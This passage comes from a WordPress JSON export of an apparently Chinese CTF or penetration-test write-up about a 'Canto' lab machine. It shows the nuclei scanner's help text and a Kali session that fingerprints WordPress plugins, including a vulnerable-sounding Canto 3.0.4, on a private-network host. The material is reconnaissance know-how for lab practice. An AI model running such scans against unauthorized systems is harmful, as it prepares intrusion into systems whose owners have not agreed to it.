-nh, -no-httpx                   disable httpx probing for non-url input\n   -no-stdin                        disable stdin processing\n\nHEADLESS:\n   -headless                        enable templates that require headless browser support (root user on Linux will disable sandbox)\n   -page-timeout int                seconds to wait for each page in headless mode (default 20)\n   -sb, -show-browser               show the browser on the screen when running templates with headless mode\n   -ho, -headless-options string[]  
start headless chrome with additional options\n   -sc, -system-chrome              use local installed Chrome browser instead of nuclei installed\n   -lha, -list-headless-action      list available headless actions\n\nDEBUG:\n   -debug                    show all requests and responses\n   -dreq, -debug-req         show all sent requests\n   -dresp, -debug-resp       show all received responses\n   -p, -proxy string[]       list of http\/socks5 proxy to use (comma separated or file input)\n   -pi, -proxy-internal      proxy all internal requests\n   -ldf, -list-dsl-function  list all supported DSL function signatures\n   -tlog, -trace-log string  file to write sent requests trace log\n   -elog, -error-log string  file to write sent requests error log\n   -version                  show nuclei version\n   -hm, -hang-monitor        enable nuclei hang monitoring\n   -v, -verbose              show verbose output\n   -profile-mem string       optional nuclei memory profile dump file\n   -vv                       display templates loaded for scan\n   -svd, -show-var-dump      show variables dump for debugging\n   -ep, -enable-pprof        enable pprof debugging server\n   -tv, -templates-version   shows the version of the installed nuclei-templates\n   -hc, -health-check        run diagnostic check up\n\nUPDATE:\n   -up, -update                      update nuclei engine to the latest released version\n   -ut, -update-templates            update nuclei-templates to latest released version\n   -ud, -update-template-dir string  custom directory to install \/ update nuclei-templates\n   -duc, -disable-update-check       disable automatic nuclei\/templates update check\n\nSTATISTICS:\n   -stats                    display statistics about the running scan\n   -sj, -stats-json          display statistics in JSONL(ines) format\n   -si, -stats-interval int  number of seconds to wait between showing a statistics update (default 5)\n   -mp, -metrics-port int    port to expose nuclei 
metrics on (default 9092)\n\nCLOUD:\n   -auth                      configure projectdiscovery cloud (pdcp) api key (default true)\n   -cup, -cloud-upload        upload scan results to pdcp dashboard\n   -sid, -scan-id string      upload scan results to existing scan id (optional)\n   -sname, -scan-name string  scan name to set (optional)\n\nAUTHENTICATION:\n   -sf, -secret-file string[]  path to config file containing secrets for nuclei authenticated scan\n   -ps, -prefetch-secrets      prefetch secrets from the secrets file\n\nEXAMPLES:\nRun nuclei on single host:\n        $ nuclei -target example.com\n\nRun nuclei with specific template directories:\n        $ nuclei -target example.com -t http\/cves\/ -t ssl\n\nRun nuclei against a list of hosts:\n        $ nuclei -list hosts.txt\n\nRun nuclei with a JSON output:\n        $ nuclei -target example.com -json-export output.json\n\nRun nuclei with sorted Markdown outputs (with environment variables):\n        $ MARKDOWN_EXPORT_SORT_MODE=template nuclei -target example.com -markdown-export nuclei_report\/\n\nAdditional documentation is available at: https:\/\/docs.nuclei.sh\/getting-started\/running\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[\/]\n\u2514\u2500$ nuclei -u http:\/\/192.168.0.135 -itags fuzz -t \/home\/kali\/nuclei-templates\/http\/fuzzing\/wordpress-plugins-detect.yaml\n\n                     __     _\n   ____  __  _______\/ \/__  (_)\n  \/ __ \\\/ \/ \/ \/ ___\/ \/ _ \\\/ \/\n \/ \/ \/ \/ \/_\/ \/ \/__\/ \/  __\/ \/\n\/_\/ \/_\/\\__,_\/\\___\/_\/\\___\/_\/   v3.2.9\n\n                projectdiscovery.io\n\n[INF] Current nuclei version: v3.2.9 (latest)\n[INF] Current nuclei-templates version: v9.9.0 (latest)\n[WRN] Scan results upload to cloud is disabled.\n[INF] New templates added in latest release: 164\n[INF] Templates loaded for current scan: 1\n[INF] Executing 1 signed templates from projectdiscovery\/nuclei-templates\n[INF] Targets loaded for current scan: 1\n[wordpress-plugins-detect] [http] 
[info] http:\/\/192.168.0.135\/wp-content\/plugins\/akismet\/readme.txt [&quot;Akismet Anti-spam: Spam Protection&quot;,&quot;5.3.2&quot;] [pluginSlug=&quot;akismet&quot;]\n[wordpress-plugins-detect] [http] [info] http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/readme.txt [&quot;Canto&quot;,&quot;3.0.4&quot;] [pluginSlug=&quot;canto&quot;]<\/code><\/pre>\n<p>nice\uff01\uff01\uff01\uff01\uff01\uff08\u539f\u8c05\u6211\u5dee\u751f\u6587\u5177\u591a\uff0c\u54c8\u54c8\u54c8\uff09<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Canto \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto] \u2514\u2500$ rusts [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-697","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/697","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=697"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/697\/revisions"}],"predecessor-version":[{"id":698,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/697\/revisions\/698"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=697"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/
v2\/categories?post=697"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=697"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}